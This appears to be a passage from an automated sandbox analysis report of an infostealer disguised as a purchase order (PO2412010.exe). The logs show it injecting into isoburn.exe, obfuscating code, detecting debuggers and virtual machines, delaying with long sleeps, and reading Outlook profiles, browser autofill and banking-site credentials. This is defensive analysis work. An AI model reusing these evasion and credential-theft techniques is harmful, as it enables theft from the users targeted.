                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\PO2412010.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: PO2412010.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO2412010.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: PO2412010.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: isoburn.pdb source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3832925744.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3832925744.0000000001238000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bsOm.pdb source: PO2412010.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: duvyEsVvTpq.exe, 00000005.00000002.3828968792.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1877721836.00000000003AE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO2412010.exe, 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1813841964.00000000043C5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.000000000470E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1811319300.0000000004217000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO2412010.exe, PO2412010.exe, 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000006.00000003.1813841964.00000000043C5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.000000000470E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1811319300.0000000004217000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3836401832.0000000004570000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: bsOm.pdbSHA256y ] source: PO2412010.exe

                Data Obfuscation

                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.cs .Net Code: cMVaApeg7l System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.cs .Net Code: cMVaApeg7l System.Reflection.Assembly.Load(byte[])
                Source: PO2412010.exe Static PE information: 0xF1A763D5 [Sun Jun 22 12:38:45 2098 UTC]
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_004148DC pushad ; retf 3_2_004148E4
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_004032C0 push eax; ret 3_2_004032C2
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00426AB3 push es; retf 3_2_00426B5B
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00418ABC push ebx; ret 3_2_00418ABD
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00413BE9 push 00000025h; iretd 3_2_00413BF0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00417C83 push edx; retf 3_2_00417CC2
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00417D07 push edx; retf 3_2_00417CC2
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00401DE9 pushad ; retf 3_2_00401E17
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00404E1D push 2A89E27Eh; ret 3_2_00404E25
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00415625 push ebp; retf 3_2_00415626
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00404F61 push ss; ret 3_2_00404F62
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A5225F pushad ; ret 3_2_01A527F9
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A527FA pushad ; ret 3_2_01A527F9
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A809AD push ecx; mov dword ptr [esp], ecx 3_2_01A809B6
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A5283D push eax; iretd 3_2_01A52858
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A5135E push eax; iretd 3_2_01A51369
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0318B3DC push 2A89E27Eh; ret 5_2_0318B3E4
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0319BBE4 push ebp; retf 5_2_0319BBE5
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0319E242 push edx; retf 5_2_0319E281
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0319E2C6 push edx; retf 5_2_0319E281
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_031A1109 push cs; retf 5_2_031A110A
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0319A1A8 push 00000025h; iretd 5_2_0319A1AF
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0319F07B push ebx; ret 5_2_0319F07C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0319F633 push ds; retf 5_2_0319F636
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0319AE9B pushad ; retf 5_2_0319AEA3
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0318B520 push ss; ret 5_2_0318B521
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_0319F5F5 push 00000035h; iretd 5_2_0319F600
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Code function: 5_2_031A0CE0 push ebx; ret 5_2_031A0CE1
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045A09AD push ecx; mov dword ptr [esp], ecx 6_2_045A09B6
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_026403EA push EBE9D31Fh; retf 6_2_02640403
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_02640406 pushfd ; iretd 6_2_02640407
                Source: PO2412010.exe Static PE information: section name: .text entropy: 7.62366801353489
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, DJWpZFaaRh43csYELG.cs High entropy of concatenated method names: 'JrAcRkasvJ', 'oDAcu2aRwV', 'xkmcDUWqtk', 'XUIc4kHrD4', 'mnqcNbBfb8', 'NJLc3Jui7V', 'TveGnbjjSilV8Xdqi7', 'S09yN5e9HxQ3tMh3a2', 'KETccWcKUw', 'ttxc24eKh6'
                Source: C:\Users\user\Desktop\PO2412010.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\isoburn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: PO2412010.exe PID: 7300, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\PO2412010.exe Memory allocated: A10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO2412010.exe Memory allocated: 2630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO2412010.exe Memory allocated: 2400000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO2412010.exe Memory allocated: 8DE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO2412010.exe Memory allocated: 9DE0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO2412010.exe Memory allocated: A000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO2412010.exe Memory allocated: B000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC096E rdtsc 3_2_01AC096E
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 240000
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 239875
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 239766
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 239641
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 239531
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 239419
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 239312
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 239203
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 239094
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 238981
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 238825
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 238671
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 238555
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 238438
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 238313
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 238188
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 238077
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 237930
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 237702
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 237586
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 237469
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 237359
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 237250
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 237141
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 237031
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236922
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236813
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236688
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236563
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236453
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236344
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236219
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236109
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 236000
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 235891
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 235781
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 235670
                Source: C:\Users\user\Desktop\PO2412010.exe Thread delayed: delay time: 235531
                Source: C:\Users\user\Desktop\PO2412010.exe Window / User API: threadDelayed 1840
                Source: C:\Users\user\Desktop\PO2412010.exe Window / User API: threadDelayed 5366
                Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 3721
                Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 6251
                Source: C:\Users\user\Desktop\PO2412010.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\isoburn.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -17524406870024063s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -239875s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -239766s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -239641s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -239531s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -239419s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -239312s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -239203s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -239094s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -238981s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -238825s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -238671s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -238555s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -238438s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -238313s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -238188s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -238077s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -237930s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -237702s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -237586s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -237469s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -237359s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -237250s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -237141s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -237031s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236922s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236813s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236688s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236563s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236453s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236344s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236219s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236109s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -236000s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -235891s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -235781s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -235670s >= -30000s
                Source: C:\Users\user\Desktop\PO2412010.exe TID: 7356 Thread sleep time: -235531s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7872 Thread sleep count: 3721 > 30
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7872 Thread sleep time: -7442000s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7872 Thread sleep count: 6251 > 30
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7872 Thread sleep time: -12502000s >= -30000s
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968 Thread sleep time: -60000s >= -30000s
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968 Thread sleep count: 32 > 30
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968 Thread sleep time: -48000s >= -30000s
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968 Thread sleep count: 33 > 30
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe TID: 7968 Thread sleep time: -33000s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_0263C4E0 FindFirstFileW,FindNextFileW,FindClose, 6_2_0263C4E0
                Source: l420377x.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: l420377x.6.dr Binary or memory string: tasks.office.comVMware20,11696503903o
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l.comVMware20,11
                Source: l420377x.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: l420377x.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: l420377x.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: l420377x.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: l420377x.6.dr Binary or memory string: bankofamerica.comVMware20,11696503903x
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sqlite_autoindex_autofill_edge_extended_1VMware
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rokers - EU WestVMware20
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: l420377x.6.dr Binary or memory string: global block list test formVMware20,11696503903
                Source: isoburn.exe, 00000006.00000002.3832319605.00000000028F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc$Gz
                Source: l420377x.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: l420377x.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: COM.HKVMware20,
                Source: l420377x.6.dr Binary or memory string: interactivebrokers.comVMware20,11696503903
                Source: l420377x.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: duvyEsVvTpq.exe, 00000009.00000002.3834494974.000000000158F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                Source: l420377x.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: l420377x.6.dr Binary or memory string: AMC password management pageVMware20,11696503903
                Source: l420377x.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: l420377x.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: l420377x.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: blocklistVMware20,1169659
                Source: firefox.exe, 0000000B.00000002.2109706572.000001C66A95C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: l420377x.6.dr Binary or memory string: outlook.office365.comVMware20,11696503903t
                Source: l420377x.6.dr Binary or memory string: outlook.office.comVMware20,11696503903s
                Source: l420377x.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hdfcbank.comVMware20,116
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: alstudio.comVMware20,116E
                Source: l420377x.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: l420377x.6.dr Binary or memory string: dev.azure.comVMware20,11696503903j
                Source: l420377x.6.dr Binary or memory string: discord.comVMware20,11696503903f
                Source: l420377x.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: C:\Users\user\Desktop\PO2412010.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\PO2412010.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\isoburn.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_00417723 LdrLoadDll, 3_2_00417723
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC0185 mov eax, dword ptr fs:[00000030h] 3_2_01AC0185
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B0019F mov eax, dword ptr fs:[00000030h] 3_2_01B0019F
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B0019F mov eax, dword ptr fs:[00000030h] 3_2_01B0019F
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B0019F mov eax, dword ptr fs:[00000030h] 3_2_01B0019F
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B0019F mov eax, dword ptr fs:[00000030h] 3_2_01B0019F
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7A197 mov eax, dword ptr fs:[00000030h] 3_2_01A7A197
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7A197 mov eax, dword ptr fs:[00000030h] 3_2_01A7A197
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01A7A197 mov eax, dword ptr fs:[00000030h] 3_2_01A7A197
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B24180 mov eax, dword ptr fs:[00000030h] 3_2_01B24180
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B24180 mov eax, dword ptr fs:[00000030h] 3_2_01B24180
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B3C188 mov eax, dword ptr fs:[00000030h] 3_2_01B3C188
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B3C188 mov eax, dword ptr fs:[00000030h] 3_2_01B3C188
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B561E5 mov eax, dword ptr fs:[00000030h] 3_2_01B561E5
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AB01F8 mov eax, dword ptr fs:[00000030h] 3_2_01AB01F8
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B461C3 mov eax, dword ptr fs:[00000030h] 3_2_01B461C3
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B461C3 mov eax, dword ptr fs:[00000030h] 3_2_01B461C3
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AFE1D0 mov ecx, dword ptr fs:[00000030h] 3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AFE1D0 mov eax, dword ptr fs:[00000030h] 3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AB0124 mov eax, dword ptr fs:[00000030h] 3_2_01AB0124
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B40115 mov eax, dword ptr fs:[00000030h] 3_2_01B40115
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2A118 mov ecx, dword ptr fs:[00000030h] 3_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2A118 mov eax, dword ptr fs:[00000030h] 3_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2A118 mov eax, dword ptr fs:[00000030h] 3_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2A118 mov eax, dword ptr fs:[00000030h] 3_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov ecx, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov ecx, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov ecx, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h] 3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01B2E10E mov ecx, dword ptr fs:[00000030h] 3_2_01B2E10E
